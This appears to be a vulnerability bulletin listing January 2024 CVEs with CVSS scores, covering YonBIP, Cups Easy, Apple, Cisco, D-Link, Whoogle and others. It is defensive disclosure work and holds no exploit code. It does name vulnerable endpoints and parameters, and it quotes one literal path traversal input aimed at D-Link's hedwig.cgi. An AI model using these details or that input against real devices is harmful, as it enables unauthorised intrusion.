yonyou — yonbip YonBIP v3_23.05 was discovered to contain a SQL injection vulnerability via the com.yonyou.hrcloud.attend.web.AttendScriptController.runScript() method. 2024-01-20 9.8 CVE-2023-51927
cve@mitre.org
cve@mitre.org
cve@mitre.org
yonyou — yonbip An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. 2024-01-20 9.8 CVE-2023-51928
cve@mitre.org
cve@mitre.org
cve@mitre.org
yonyou — yonbip YonBIP v3_23.05 was discovered to contain an arbitrary file read vulnerability via the nc.bs.framework.comn.serv.CommonServletDispatcher component. 2024-01-20 7.5 CVE-2023-51926
cve@mitre.org
cve@mitre.org
cve@mitre.org

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
BORGChat — borgchat
 
A vulnerability, which was classified as problematic, was found in BORGChat 1.0.0 Build 438. This affects an unknown part of the component Service Port 7551. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252039. 2024-01-25 5.3 CVE-2024-0888
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
actidata — actinas_sl_2u-8_rdx_firmware Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML. 2024-01-19 6.1 CVE-2023-51946
cve@mitre.org
cve@mitre.org
cve@mitre.org
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodemodify.php, in multiple parameters. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-25 6.1 CVE-2024-23855
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemlist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23856
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23857
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23858
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelinecreate.php, in the flatamount parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23859
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23860
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/unitofmeasurementcreate.php, in the unitofmeasurementid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23861
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grndisplay.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23862
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuredisplay.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23863
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23864
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23865
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrycreate.php, in the countryid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23866
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statecreate.php, in the stateid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23867
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlist.php, in the deleted parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23868
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuanceprint.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23869
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelist.php, in the delete parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23870
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/unitofmeasurementmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23871
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23872
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencymodify.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23873
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/companymodify.php, in the address1 parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23874
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancedisplay.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23875
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurecreate.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23876
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencycreate.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23877
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnprint.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23878
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statemodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23879
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23880
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23881
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodecreate.php, in the taxcodeid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23882
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuremodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23883
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnmodify.php, in the grndate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23884
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrymodify.php, in the countryid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23885
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemmodify.php, in the bincardinfo parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23886
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grncreate.php, in the grndate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23887
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stocktransactionslist.php, in the itemidy parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23888
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemgroupcreate.php, in the itemgroupid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23889
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itempopup.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23890
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemcreate.php, in the itemid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23891
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentercreate.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23892
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentermodify.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23893
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancecreate.php, in the issuancedate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23894
cve-coordination@incibe.es
ajaysharma — cups_easy A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stock.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. 2024-01-26 6.1 CVE-2024-23896
cve-coordination@incibe.es
amazon — aws_encryption_sdk AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures. 2024-01-19 5.3 CVE-2024-23680
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
any-capture — any_sound_recorder
 
A vulnerability was found in Any-Capture Any Sound Recorder 2.93. It has been declared as problematic. This vulnerability affects unknown code of the component Registration Handler. The manipulation of the argument User Name/Key Code leads to memory corruption. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-251674 is the identifier assigned to this vulnerability. 2024-01-22 5.3 CVE-2024-0774
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
apache — tomcat Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue. 2024-01-19 5.3 CVE-2024-21733
security@apache.org
security@apache.org
apple — ipados An access issue was addressed with improved access restrictions. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A maliciously crafted webpage may be able to fingerprint the user. 2024-01-23 6.5 CVE-2024-23206
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ipados A privacy issue was addressed with improved handling of files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access sensitive user data. 2024-01-23 6.2 CVE-2024-23223
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ipados This issue was addressed by removing the vulnerable code. This issue is fixed in tvOS 17, watchOS 10, macOS Sonoma 14, iOS 17 and iPadOS 17, macOS Ventura 13.6.4. An app may be able to bypass Privacy preferences. 2024-01-23 5.5 CVE-2023-40528
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ipados The issue was addressed with improved checks. This issue is fixed in iOS 16.7.5 and iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 and iPadOS 17.2. Processing a maliciously crafted image may result in disclosure of process memory. 2024-01-23 5.5 CVE-2023-42888
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ipados This issue was addressed with improved redaction of sensitive information. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to access sensitive user data. 2024-01-23 5.5 CVE-2024-23207
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2. An app may be able to read arbitrary files. 2024-01-23 6.3 CVE-2023-42887
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.3, macOS Ventura 13.6.4. An app may be able to access sensitive user data. 2024-01-23 5.5 CVE-2024-23224
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
autolab — eventprime
 
Autolab is a course management service that enables instructors to offer autograded programming assignments to their students over the Web. Path traversal vulnerabilities were discovered in Autolab’s assessment functionality in versions of Autolab prior to 2.12.0, whereby instructors can perform arbitrary file reads. Version 2.12.0 contains a patch. There are no feasible workarounds for this issue. 2024-01-22 4.9 CVE-2023-44395
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
beijing_baichuo — smart_s210_management_platform
 
A vulnerability has been found in Beijing Baichuo Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 6.3 CVE-2024-0939
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
benbusby — whoogle_search
 
Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a `GET` request on lines 339-343 in `requests.py`. The returned contents of the URL are then passed to and reflected back to the user in the `send_file` function on line 484, together with the user-controlled `src_type`, which allows the attacker to control the HTTP response content type leading to a cross-site scripting vulnerability. An attacker could craft a special URL to point to a malicious website and send the link to a victim. The fact that the link would contain a trusted domain (e.g. from one of public Whoogle instances) could be used to trick the user into clicking the link.The malicious website could, for example, be a copy of a real website, meant to steal a person’s credentials to the website, or trick that person in another way. Version 0.8.4 contains a patch for this issue. 2024-01-23 6.1 CVE-2024-22417
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
benbusby — whoogle_search
 
Whoogle Search is a self-hosted metasearch engine. Versions 0.8.3 and prior have a limited file write vulnerability when the configuration options in Whoogle are enabled. The `config` function in `app/routes.py` does not validate the user-controlled `name` variable on line 447 and `config_data` variable on line 437. The `name` variable is insecurely concatenated in `os.path.join`, leading to path manipulation. The POST data from the `config_data` variable is saved with `pickle.dump` which leads to a limited file write. However, the data that is saved is earlier transformed into a dictionary and the `url` key value pair is added before the file is saved on the system. All in all, the issue allows us to save and overwrite files on the system that the application has permissions to, with a dictionary containing arbitrary data and the `url` key value, which is a limited file write. Version 0.8.4 contains a patch for this issue. 2024-01-23 5.3 CVE-2024-22204
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
byzoro — smart_s150_firmware A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-19 5.3 CVE-2024-0716
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
canonical_ltd. — ubuntu_pipewire-pulse
 
Ubuntu’s pipewire-pulse in snap grants microphone access even when the snap interface for audio-record is not set. 2024-01-24 5.5 CVE-2022-4964
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
cisco — cisco_small_business_smart_and_managed_switches
 
A vulnerability with the access control list (ACL) management within a stacked switch configuration of Cisco Business 250 Series Smart Switches and Business 350 Series Managed Switches could allow an unauthenticated, remote attacker to bypass protection offered by a configured ACL on an affected device. This vulnerability is due to incorrect processing of ACLs on a stacked configuration when either the primary or backup switches experience a full stack reload or power cycle. An attacker could exploit this vulnerability by sending crafted traffic through an affected device. A successful exploit could allow the attacker to bypass configured ACLs, causing traffic to be dropped or forwarded in an unexpected manner. The attacker does not have control over the conditions that result in the device being in the vulnerable state. Note: In the vulnerable state, the ACL would be correctly applied on the primary devices but could be incorrectly applied to the backup devices. 2024-01-26 5.8 CVE-2024-20263
ykramarz@cisco.com
cisco — cisco_unity_connection
 
A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. 2024-01-26 4.8 CVE-2024-20305
ykramarz@cisco.com
code-projects — social_networking_site A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability. 2024-01-19 5.4 CVE-2024-0722
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
consensys — discovery Consensys Discovery versions less than 0.4.5 uses the same AES/GCM nonce for the entire session. which should ideally be unique for every message. The node’s private key isn’t compromised, only the session key generated for specific peer communication is exposed. 2024-01-19 5.3 CVE-2024-23688
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
cozmoslabs — profile_builder_pro
 
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Cozmoslabs Profile Builder Pro. This issue affects Profile Builder Pro: from n/a through 3.10.0. 2024-01-24 6.5 CVE-2024-22141
audit@patchstack.com
d-link — dir-816_a2
 
A vulnerability has been found in D-Link DIR-816 A2 1.10CNB04 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /goform/setDeviceSettings of the component Web Interface. The manipulation of the argument statuscheckpppoeuser leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252139. 2024-01-26 4.7 CVE-2024-0921
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
d-link– dir-859 1.06B01
 
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. 2024-01-21 5.3 CVE-2024-0769
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
dell — dell_pair
 
Dell Pair Installer version prior to 1.2.1 contains an elevation of privilege vulnerability. A low privilege user with local access to the system could potentially exploit this vulnerability to delete arbitrary files and result in Denial of Service. 2024-01-24 6.6 CVE-2023-44281
security_alert@emc.com
